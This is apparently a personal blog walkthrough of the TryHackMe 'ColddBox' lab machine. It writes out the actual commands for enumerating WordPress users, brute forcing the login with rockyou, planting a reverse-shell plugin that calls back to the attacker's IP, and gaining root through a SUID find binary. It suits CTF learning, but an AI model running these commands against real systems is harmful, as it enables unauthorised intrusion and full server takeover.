TryHackMe Walkthrough - ColddBox
No beers were found in this room :(
15/01/2021
Back again with another easy box from TryHackMe! You can check the room out here!
tl:dr enumerate usernames, brute force passwords, reverse shell with malicious WordPress plugin and escalate privilege using a bad SUID.
Enumeration
As always, let's start with some enumeration. I ran a few different scans - nmap, nikto, wpscan and dirb. The nmap scan was a basic full port and service scan. It showed us two things.
1. Port 80 is open so we're working with a webserver (hence the other scans run)
2. SSH is there but it's running on a non standard port (4512)
nmap -p- -sV 10.10.207.52
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 09:27 GMT
Nmap scan report for 10.10.207.52
Host is up (0.044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel
Out nikto scan also found a few interesting items!
\+ OSVDB-3092: /hidden/: This might be interesting...
\+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
\+ OSVDB-3233: /icons/README: Apache default file found.
\+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
\+ /wp-links-opml.php: This WordPress script reveals the installed version.
\+ OSVDB-3092: /license.txt: License file found may identify site software.
\+ /: A Wordpress installation was found.
\+ Cookie wordpress\_test\_cookie created without the httponly flag
\+ /wp-login.php: Wordpress login found
Let's start with the "hidden" directory. Visiting it landed us on a page with some interesting test...
U-R-G-E-N-T
C0ldd, you changed Hugo's password, when you can send it to him so he can continue uploading his articles. Philip
Now we know 3 users - C0ldd, Huge and Philip. Seems like Philip is the boss! We can confirm this with a "wpscan" using the "--enumereate u" flag stuck on the end. I put all these usernames in a file called "users.txt".
\[+\] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
\[+\] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
\[+\] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
We also found a "/wp-login.php" file, which is the standard wordpress login portal. This could be handy if we ever find some passwords for our usernames!
User + Root Flag
So we have some usernames and a login portal. We need passwords! I did some more scanning and fiddling about but didn't find any, so let’s try some good ol' brute force. We can use wpscan to do this job with the command:
wpscan --url http://10.10.207.52 -U users.txt -P /usr/share/wordlists/rockyou.txt
I let that run for a minute or two and boom! We have the password for "c0ldd"! ((9876543210)) We can use this to login via "/wp-login.php". Once in, I had a snoop around but didn't find any nice plain text passwords. Time for Malicious WordPress Plugin!! We can use this to create a reverse shell on the server. Simply follow the intructions on the github page, it's very simple (make sure the IP you use to call back to is the one on the TryHackMe website in the top right corner in the little green box!!).
python3 wordpwn.py 10.8.16.218 1234 Y
Once it was created, we upload the plugin .zip file to the wordpress site and visit the page!
http://(target)/wp-content/plugins/malicious/wetw0rk\_maybe.php
Pop! There's our shell! I decided to downgrade from meterpreter to a normal shell by running "shell" and then upgrade to a nice normal shell using python3!
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we can explore! I found a "user.txt" file in the home folder of "c0ldd" but didn't have the permission to access it! Lets try something else...
I couldn't find anything else. Lets try some privilage escalation! Doing a quick "suid" search came up with a few results. After checking them all in GTFOBins, I found a way to abuse find to let us get root access.
www-data@ColddBox-Easy:/var/www/html/wp-admin$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86\_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
If we run the following command, we can get root access:
find . -exec /bin/sh -p \\; -quit
Just like that, we're root! You can check this by running "whoami". Now we can just go grab both the root and the user flag.
Conclusion
This way of obtaining the flags doesn't seem like the intended method due to the fact we never used SSH and found the userflag after getting root access. However, it works and is therefore valid!